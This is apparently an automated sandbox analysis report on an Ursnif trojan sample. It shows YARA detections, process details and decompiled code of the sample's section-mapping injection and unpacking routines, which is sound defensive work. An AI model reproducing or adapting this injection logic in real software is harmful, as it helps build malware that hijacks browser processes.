                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:03:15
                                                                                                                                                                      Start date:14/09/2021
                                                                                                                                                                      Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                      Imagebase:0x7ff721e20000
                                                                                                                                                                      File size:823560 bytes
                                                                                                                                                                      MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:03:17
                                                                                                                                                                      Start date:14/09/2021
                                                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2
                                                                                                                                                                      Imagebase:0xb20000
                                                                                                                                                                      File size:822536 bytes
                                                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Code Analysis

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                        			E004022D1(void* __edx, void* __esi, intOrPtr* _a4, signed int _a8) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				int _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				char _v36;
                                                                                                                                                                        				void* _v40;
                                                                                                                                                                        				void* _v44;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                        				signed int _t107;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				void* _t111;
                                                                                                                                                                        				long _t116;
                                                                                                                                                                        				long _t117;
                                                                                                                                                                        				void* _t123;
                                                                                                                                                                        				void* _t126;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				int _t128;
                                                                                                                                                                        				unsigned int _t129;
                                                                                                                                                                        				void* _t134;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				void* _t140;
                                                                                                                                                                        				void* _t144;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				void* _t152;
                                                                                                                                                                        				signed int _t158;
                                                                                                                                                                        				intOrPtr _t166;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        				signed int _t168;
                                                                                                                                                                        				void* _t171;
                                                                                                                                                                        				void* _t172;
                                                                                                                                                                        				void* _t175;
                                                                                                                                                                        				void* _t176;
                                                                                                                                                                        
                                                                                                                                                                        				_t175 = __esi;
                                                                                                                                                                        				_t107 = _a8 & 0x00000010;
                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				_v28 = 0;
                                                                                                                                                                        				_v36 = E00402977;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_v44 = _t107;
                                                                                                                                                                        				if(_t107 != 0 || ( *0x405478 & 0x00000001) == 0) {
                                                                                                                                                                        					_v20 =  *_t175;
                                                                                                                                                                        					_t109 =  *(_t175 + 0x10);
                                                                                                                                                                        					_t167 = _v20;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t167 =  *(__esi + 8);
                                                                                                                                                                        					_t109 =  *(__esi + 0x14);
                                                                                                                                                                        					_v36 = 0x405068;
                                                                                                                                                                        					_v20 = _t167;
                                                                                                                                                                        					_v8 = 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v24 = _t109;
                                                                                                                                                                        				if(_t167 != 0) {
                                                                                                                                                                        					__eflags =  *_t167 - 0x5a4d;
                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                        						L10:
                                                                                                                                                                        						_t111 =  *((intOrPtr*)(_t167 + 0x3c)) + _t167;
                                                                                                                                                                        						__eflags = _t111 - _t167;
                                                                                                                                                                        						if(_t111 < _t167) {
                                                                                                                                                                        							L36:
                                                                                                                                                                        							_v8 = 0xb;
                                                                                                                                                                        							L37:
                                                                                                                                                                        							__eflags = _v16;
                                                                                                                                                                        							if(_v16 == 0) {
                                                                                                                                                                        								L41:
                                                                                                                                                                        								__eflags = _v28;
                                                                                                                                                                        								if(_v28 == 0) {
                                                                                                                                                                        									L44:
                                                                                                                                                                        									__eflags = _v32;
                                                                                                                                                                        									if(_v32 != 0) {
                                                                                                                                                                        										memset(_v32, 0, _v24);
                                                                                                                                                                        										E00401759(_v32);
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L46;
                                                                                                                                                                        								}
                                                                                                                                                                        								_push(_v28);
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(_v16);
                                                                                                                                                                        							_t116 = NtUnmapViewOfSection(0xffffffff); // executed
                                                                                                                                                                        							_t117 = RtlNtStatusToDosError(_t116);
                                                                                                                                                                        							asm("loopne 0x42");
                                                                                                                                                                        							_t97 = _t152 + 0x7400e87d;
                                                                                                                                                                        							 *_t97 =  *(_t152 + 0x7400e87d) + _t117 + 1;
                                                                                                                                                                        							__eflags =  *_t97;
                                                                                                                                                                        							goto L41;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t166 = _t111 + 0xf8;
                                                                                                                                                                        						__eflags = _t166 - _t167 + _v24;
                                                                                                                                                                        						if(_t166 >= _t167 + _v24) {
                                                                                                                                                                        							goto L36;
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags = _v8;
                                                                                                                                                                        						_t158 =  *(_t111 + 4) & 0x0000ffff;
                                                                                                                                                                        						if(_v8 == 0) {
                                                                                                                                                                        							__eflags = _t158 - 0x14c;
                                                                                                                                                                        							if(_t158 == 0x14c) {
                                                                                                                                                                        								L14:
                                                                                                                                                                        								_t152 =  *((intOrPtr*)(_t111 + 0x50)) + 0x00000fff & 0xfffff000;
                                                                                                                                                                        								_t123 = E0040202A( *(_t175 + 0x14) + _t152 +  *(_t175 + 0x10) + 0xc50,  &_v16,  &_v28); // executed
                                                                                                                                                                        								__eflags = _t123;
                                                                                                                                                                        								_v8 = _t123;
                                                                                                                                                                        								if(_t123 != 0) {
                                                                                                                                                                        									goto L37;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t168 =  *0x405490; // 0x736c6e70
                                                                                                                                                                        								_t171 = _t152 + (_t168 ^ 0x736c6220) + _v16;
                                                                                                                                                                        								_v40 = _t171;
                                                                                                                                                                        								_t126 = E0040171A(_v28,  *_a4,  &_v12); // executed
                                                                                                                                                                        								__eflags = _t126;
                                                                                                                                                                        								_v8 = _t126;
                                                                                                                                                                        								if(_t126 != 0) {
                                                                                                                                                                        									goto L37;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t127 = E00402629(_v16, _v20, _v12);
                                                                                                                                                                        								__eflags = _t127;
                                                                                                                                                                        								_v8 = _t127;
                                                                                                                                                                        								if(_t127 != 0) {
                                                                                                                                                                        									goto L37;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t128 =  *(_t175 + 0x10);
                                                                                                                                                                        								__eflags = _t128;
                                                                                                                                                                        								if(_t128 != 0) {
                                                                                                                                                                        									memcpy(_t171,  *_t175, _t128);
                                                                                                                                                                        									_t176 = _t176 + 0xc;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t129 =  *(_t175 + 0x14);
                                                                                                                                                                        								__eflags = _t129;
                                                                                                                                                                        								if(_t129 == 0) {
                                                                                                                                                                        									L26:
                                                                                                                                                                        									_t172 = _t152 + _v16;
                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                        									 *((intOrPtr*)(_t172 + 0x30)) = _v12;
                                                                                                                                                                        									 *((intOrPtr*)(_t172 + 0x34)) = _t166;
                                                                                                                                                                        									memcpy(_t172 + 0x18, _t175, 0x18);
                                                                                                                                                                        									_t176 = _t176 + 0xc;
                                                                                                                                                                        									__eflags =  *(_t175 + 0x10);
                                                                                                                                                                        									if( *(_t175 + 0x10) != 0) {
                                                                                                                                                                        										asm("cdq");
                                                                                                                                                                        										 *(_t172 + 0x18) = _t152 + _v12 + 0xc50;
                                                                                                                                                                        										 *((intOrPtr*)(_t172 + 0x1c)) = _t166;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags =  *(_t175 + 0x14);
                                                                                                                                                                        									if( *(_t175 + 0x14) != 0) {
                                                                                                                                                                        										_t140 = _v12 + _t152;
                                                                                                                                                                        										__eflags = _t140;
                                                                                                                                                                        										asm("cdq");
                                                                                                                                                                        										 *((intOrPtr*)(_t172 + 0x20)) = _t140 +  *(_t175 + 0x10) + 0xc50;
                                                                                                                                                                        										 *((intOrPtr*)(_t172 + 0x24)) = _t166;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _v44;
                                                                                                                                                                        									if(_v44 != 0) {
                                                                                                                                                                        										L33:
                                                                                                                                                                        										_t134 = E004020E9(_t166, _t172);
                                                                                                                                                                        										goto L34;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										__eflags =  *0x405478 & 0x00000001;
                                                                                                                                                                        										if(( *0x405478 & 0x00000001) == 0) {
                                                                                                                                                                        											goto L33;
                                                                                                                                                                        										}
                                                                                                                                                                        										_push( *_a4);
                                                                                                                                                                        										_t134 = E0040258A(_t166, _t172);
                                                                                                                                                                        										L34:
                                                                                                                                                                        										__eflags = _t134;
                                                                                                                                                                        										_v8 = _t134;
                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                        											_t89 =  &_v36; // 0x402977
                                                                                                                                                                        											memcpy(_t172 + 0x40,  *_t89, 0x800);
                                                                                                                                                                        											_t176 = _t176 + 0xc;
                                                                                                                                                                        											_t154 = _t152 + _v12;
                                                                                                                                                                        											_t152 = _t152 + _v12 + 0x40;
                                                                                                                                                                        											_t137 = E004027D6(_t166, __eflags, _a4, _t152, _t154, _a8); // executed
                                                                                                                                                                        											_v8 = _t137;
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L37;
                                                                                                                                                                        									}
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t144 = _t129 >> 2;
                                                                                                                                                                        									__eflags = _t144;
                                                                                                                                                                        									_v20 = _t144;
                                                                                                                                                                        									if(_t144 == 0) {
                                                                                                                                                                        										goto L26;
                                                                                                                                                                        									}
                                                                                                                                                                        									while(1) {
                                                                                                                                                                        										_t146 = _v20 << 2;
                                                                                                                                                                        										_t57 =  &_v20;
                                                                                                                                                                        										 *_t57 = _v20 - 1;
                                                                                                                                                                        										__eflags =  *_t57;
                                                                                                                                                                        										_t166 = _t171 + _t146;
                                                                                                                                                                        										 *((intOrPtr*)(_t166 +  *(_t175 + 0x10) - 4)) =  *((intOrPtr*)(_t146 +  *((intOrPtr*)(_t175 + 8)) - 4));
                                                                                                                                                                        										if( *_t57 == 0) {
                                                                                                                                                                        											goto L26;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t171 = _v40;
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L26;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							L23:
                                                                                                                                                                        							_v8 = 0xb;
                                                                                                                                                                        							goto L44;
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags = _t158 - 0x8664;
                                                                                                                                                                        						if(_t158 != 0x8664) {
                                                                                                                                                                        							goto L23;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L14;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(_v24);
                                                                                                                                                                        					_t152 = E004017EF(_t109, _t152, __eflags);
                                                                                                                                                                        					__eflags = _t152;
                                                                                                                                                                        					_v32 = _t152;
                                                                                                                                                                        					if(_t152 != 0) {
                                                                                                                                                                        						E00401D33(_t152, _t167, _v24,  *0x40548c, 0);
                                                                                                                                                                        						_v20 = _t152;
                                                                                                                                                                        						_t167 = _t152;
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v8 = 8;
                                                                                                                                                                        					goto L44;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_v8 = 2;
                                                                                                                                                                        					L46:
                                                                                                                                                                        					return _v8;
                                                                                                                                                                        				}
                                                                                                                                                                        			}







































                                                                                                                                                                        0x004022d1
                                                                                                                                                                        0x004022dd
                                                                                                                                                                        0x004022e1
                                                                                                                                                                        0x004022e4
                                                                                                                                                                        0x004022e7
                                                                                                                                                                        0x004022ea
                                                                                                                                                                        0x004022ed
                                                                                                                                                                        0x004022f4
                                                                                                                                                                        0x004022f7
                                                                                                                                                                        0x004022fa
                                                                                                                                                                        0x00402320
                                                                                                                                                                        0x00402323
                                                                                                                                                                        0x00402326
                                                                                                                                                                        0x00402305
                                                                                                                                                                        0x00402305
                                                                                                                                                                        0x00402308
                                                                                                                                                                        0x0040230b
                                                                                                                                                                        0x00402312
                                                                                                                                                                        0x00402315
                                                                                                                                                                        0x00402315
                                                                                                                                                                        0x0040232b
                                                                                                                                                                        0x0040232e
                                                                                                                                                                        0x0040233c
                                                                                                                                                                        0x00402341
                                                                                                                                                                        0x00402379
                                                                                                                                                                        0x0040237c
                                                                                                                                                                        0x0040237e
                                                                                                                                                                        0x00402380
                                                                                                                                                                        0x00402535
                                                                                                                                                                        0x00402535
                                                                                                                                                                        0x0040253c
                                                                                                                                                                        0x0040253c
                                                                                                                                                                        0x00402540
                                                                                                                                                                        0x00402554
                                                                                                                                                                        0x00402554
                                                                                                                                                                        0x00402558
                                                                                                                                                                        0x00402563
                                                                                                                                                                        0x00402563
                                                                                                                                                                        0x00402567
                                                                                                                                                                        0x00402571
                                                                                                                                                                        0x0040257c
                                                                                                                                                                        0x0040257c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402567
                                                                                                                                                                        0x0040255a
                                                                                                                                                                        0x0040255a
                                                                                                                                                                        0x00402542
                                                                                                                                                                        0x00402547
                                                                                                                                                                        0x0040254e
                                                                                                                                                                        0x00402550
                                                                                                                                                                        0x00402553
                                                                                                                                                                        0x00402553
                                                                                                                                                                        0x00402553
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402553
                                                                                                                                                                        0x0040238b
                                                                                                                                                                        0x00402391
                                                                                                                                                                        0x00402393
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402399
                                                                                                                                                                        0x0040239d
                                                                                                                                                                        0x004023a1
                                                                                                                                                                        0x00402456
                                                                                                                                                                        0x0040245b
                                                                                                                                                                        0x004023b2
                                                                                                                                                                        0x004023c1
                                                                                                                                                                        0x004023d9
                                                                                                                                                                        0x004023de
                                                                                                                                                                        0x004023e0
                                                                                                                                                                        0x004023e3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004023e9
                                                                                                                                                                        0x00402403
                                                                                                                                                                        0x00402406
                                                                                                                                                                        0x00402409
                                                                                                                                                                        0x0040240e
                                                                                                                                                                        0x00402410
                                                                                                                                                                        0x00402413
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402422
                                                                                                                                                                        0x00402427
                                                                                                                                                                        0x00402429
                                                                                                                                                                        0x0040242c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402432
                                                                                                                                                                        0x00402435
                                                                                                                                                                        0x00402437
                                                                                                                                                                        0x0040243d
                                                                                                                                                                        0x00402442
                                                                                                                                                                        0x00402442
                                                                                                                                                                        0x00402445
                                                                                                                                                                        0x00402448
                                                                                                                                                                        0x0040244a
                                                                                                                                                                        0x0040248c
                                                                                                                                                                        0x0040248f
                                                                                                                                                                        0x00402495
                                                                                                                                                                        0x00402498
                                                                                                                                                                        0x004024a0
                                                                                                                                                                        0x004024a3
                                                                                                                                                                        0x004024a8
                                                                                                                                                                        0x004024ab
                                                                                                                                                                        0x004024af
                                                                                                                                                                        0x004024bb
                                                                                                                                                                        0x004024bc
                                                                                                                                                                        0x004024bf
                                                                                                                                                                        0x004024bf
                                                                                                                                                                        0x004024c2
                                                                                                                                                                        0x004024c6
                                                                                                                                                                        0x004024ce
                                                                                                                                                                        0x004024ce
                                                                                                                                                                        0x004024d7
                                                                                                                                                                        0x004024d8
                                                                                                                                                                        0x004024db
                                                                                                                                                                        0x004024db
                                                                                                                                                                        0x004024de
                                                                                                                                                                        0x004024e2
                                                                                                                                                                        0x004024fa
                                                                                                                                                                        0x004024fb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004024e4
                                                                                                                                                                        0x004024e4
                                                                                                                                                                        0x004024eb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004024f0
                                                                                                                                                                        0x004024f3
                                                                                                                                                                        0x00402500
                                                                                                                                                                        0x00402500
                                                                                                                                                                        0x00402502
                                                                                                                                                                        0x00402505
                                                                                                                                                                        0x0040250c
                                                                                                                                                                        0x00402513
                                                                                                                                                                        0x0040251b
                                                                                                                                                                        0x00402521
                                                                                                                                                                        0x00402524
                                                                                                                                                                        0x0040252b
                                                                                                                                                                        0x00402530
                                                                                                                                                                        0x00402530
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402505
                                                                                                                                                                        0x0040244c
                                                                                                                                                                        0x0040244c
                                                                                                                                                                        0x0040244c
                                                                                                                                                                        0x0040244f
                                                                                                                                                                        0x00402452
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402470
                                                                                                                                                                        0x00402476
                                                                                                                                                                        0x00402479
                                                                                                                                                                        0x00402479
                                                                                                                                                                        0x00402479
                                                                                                                                                                        0x0040247c
                                                                                                                                                                        0x00402486
                                                                                                                                                                        0x0040248a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040246d
                                                                                                                                                                        0x0040246d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402470
                                                                                                                                                                        0x0040244a
                                                                                                                                                                        0x00402461
                                                                                                                                                                        0x00402461
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402461
                                                                                                                                                                        0x004023a7
                                                                                                                                                                        0x004023ac
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004023ac
                                                                                                                                                                        0x00402343
                                                                                                                                                                        0x0040234b
                                                                                                                                                                        0x0040234d
                                                                                                                                                                        0x0040234f
                                                                                                                                                                        0x00402352
                                                                                                                                                                        0x0040236f
                                                                                                                                                                        0x00402374
                                                                                                                                                                        0x00402377
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402377
                                                                                                                                                                        0x00402354
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402330
                                                                                                                                                                        0x00402330
                                                                                                                                                                        0x00402581
                                                                                                                                                                        0x00402587
                                                                                                                                                                        0x00402587

                                                                                                                                                                        APIs
                                                                                                                                                                        • memcpy.NTDLL(?,?,?,?,?,00000000,00401B14,00000000,00000000,?,?,00401B14,?,00000000), ref: 0040243D
                                                                                                                                                                        • memcpy.NTDLL(?,?,00000018,?,?,00000000,00401B14,00000000,00000000,?,?,00401B14,?,00000000), ref: 004024A3
                                                                                                                                                                        • memcpy.NTDLL(?,w)@,00000800,?,00401B14,?,00000000), ref: 00402513
                                                                                                                                                                          • Part of subcall function 0040202A: NtCreateSection.NTDLL ref: 00402085
                                                                                                                                                                          • Part of subcall function 0040202A: memset.NTDLL ref: 004020AA
                                                                                                                                                                          • Part of subcall function 0040202A: ZwClose.NTDLL(?), ref: 004020DA
                                                                                                                                                                          • Part of subcall function 0040171A: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 00401747
                                                                                                                                                                          • Part of subcall function 0040171A: RtlNtStatusToDosError.NTDLL ref: 0040174E
                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00402547
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0040254E
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 0040255D
                                                                                                                                                                        • memset.NTDLL ref: 00402571
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sectionmemcpy$CloseErrorStatusViewmemset$ChangeCreateFindNotificationUnmap
                                                                                                                                                                        • String ID: pnls$w)@
                                                                                                                                                                        • API String ID: 724331112-2680927416
                                                                                                                                                                        • Opcode ID: 8be9d17189d34d3643d16771b9c5462e74dec51dfc883c8e6551046c8acdf72a
                                                                                                                                                                        • Instruction ID: bd930ac68285c61fd66731e6645eefbb964c4e59fcd4f8463753af5a5e12df5e
                                                                                                                                                                        • Opcode Fuzzy Hash: 8be9d17189d34d3643d16771b9c5462e74dec51dfc883c8e6551046c8acdf72a
                                                                                                                                                                        • Instruction Fuzzy Hash: 74915D7190020AEBCB10DF94DA88BAEBBB1FF04304F14457AE805B73D1D7B8AA45DB58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000992,00003000,00000040,00000992,004354D6), ref: 00435AAE
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000062,00003000,00000040,00435510), ref: 00435AE5
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,0000DF3D,00003000,00000040), ref: 00435B45
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00435B7B
                                                                                                                                                                        • VirtualProtect.KERNEL32(00400000,00000000,00000004,004359A5), ref: 00435C8A
                                                                                                                                                                        • VirtualProtect.KERNEL32(00400000,00001000,00000004,004359A5), ref: 00435CB1
                                                                                                                                                                        • VirtualProtect.KERNEL32(00000000,?,00000002,004359A5), ref: 00435D77
                                                                                                                                                                        • VirtualProtect.KERNEL32(00000000,?,00000002,004359A5,?), ref: 00435DCD
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00435DF1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.429066587.0000000000435000.00000040.00020000.sdmp, Offset: 00435000, based on PE: false
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2574235972-0
                                                                                                                                                                        • Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
                                                                                                                                                                        • Instruction ID: d45f3c6101e7fe05159cbc00f7f1c4ba997776035c7e8d397e7b1361e89befb7
                                                                                                                                                                        • Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
                                                                                                                                                                        • Instruction Fuzzy Hash: AFD18A726006009FEB11EF54C880F5277B6FF68314F890299ED0D9F66ADB74A921CB6C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000992,00003000,00000040,00000992,00800000), ref: 008005D8
                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000062,00003000,00000040,0080003A), ref: 0080060F
                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,0000DF3D,00003000,00000040), ref: 0080066F
                                                                                                                                                                        • VirtualFree.KERNELBASE(00820000,00000000,00008000), ref: 008006A5
                                                                                                                                                                        • VirtualProtect.KERNELBASE(00400000,0000F000,00000004,008004CF), ref: 008007B4
                                                                                                                                                                        • VirtualProtect.KERNEL32(00400000,00001000,00000004,008004CF), ref: 008007DB
                                                                                                                                                                          • Part of subcall function 008003A1: LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 008003DA
                                                                                                                                                                        • VirtualProtect.KERNELBASE(00400000,?,00000002,008004CF), ref: 008008A1
                                                                                                                                                                        • VirtualProtect.KERNELBASE(00400000,?,00000002,008004CF,?), ref: 008008F7
                                                                                                                                                                        • VirtualFree.KERNELBASE(00820000,00000000,00008000), ref: 0080091B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.429106240.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Virtual$Protect$Alloc$Free$LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1732388798-0
                                                                                                                                                                        • Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
                                                                                                                                                                        • Instruction ID: a39150e54f6a73939501a8bdf2c425cdd169f816aa0e8100bcd6ce85bbce8bc5
                                                                                                                                                                        • Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8AD17D727002009FEB65EF54CC80F5177A6FF64710F9902A4ED0D9F6AADA74A921CF68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                        			E00402F98(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr* __esi) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				intOrPtr _v544;
                                                                                                                                                                        				intOrPtr _v552;
                                                                                                                                                                        				void _v724;
                                                                                                                                                                        				char _v728;
                                                                                                                                                                        				long _t40;
                                                                                                                                                                        				long _t48;
                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				intOrPtr* _t58;
                                                                                                                                                                        				void* _t60;
                                                                                                                                                                        				intOrPtr* _t61;
                                                                                                                                                                        				intOrPtr _t62;
                                                                                                                                                                        				intOrPtr* _t63;
                                                                                                                                                                        				void* _t67;
                                                                                                                                                                        
                                                                                                                                                                        				_t63 = __esi;
                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                        				_t56 = __ecx;
                                                                                                                                                                        				_t61 = __eax;
                                                                                                                                                                        				_v728 = 0;
                                                                                                                                                                        				memset( &_v724, 0, 0x2c8);
                                                                                                                                                                        				_t67 =  *((intOrPtr*)(_t61 + 8)) -  *0x405470; // 0x1ae8
                                                                                                                                                                        				if(_t67 == 0) {
                                                                                                                                                                        					_push( *((intOrPtr*)(__esi + 0x10)));
                                                                                                                                                                        					if( *((intOrPtr*)(__esi + 8))() != 0) {
                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                        						goto L13;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_v8 = 0x23f;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_v728 = 0x10003;
                                                                                                                                                                        					_t55 = E004018E5(_t56,  *_t61);
                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                        						L14:
                                                                                                                                                                        						_v8 = GetLastError();
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t40 = E00401646( *((intOrPtr*)(_t61 + 4)),  &_v728);
                                                                                                                                                                        						_v8 = _t40;
                                                                                                                                                                        						if(_t40 != 0) {
                                                                                                                                                                        							L13:
                                                                                                                                                                        							if(_v8 == 0xffffffff) {
                                                                                                                                                                        								goto L14;
                                                                                                                                                                        							}
                                                                                                                                                                        						} else {
                                                                                                                                                                        							 *(__esi + 4) =  *(__esi + 4) & 0x00000000;
                                                                                                                                                                        							 *__esi = _v544;
                                                                                                                                                                        							_t11 = _t55 + 0x218; // 0x218
                                                                                                                                                                        							_v544 = _t11;
                                                                                                                                                                        							_t13 = _t63 + 0x218; // 0x218
                                                                                                                                                                        							_v552 = _t55;
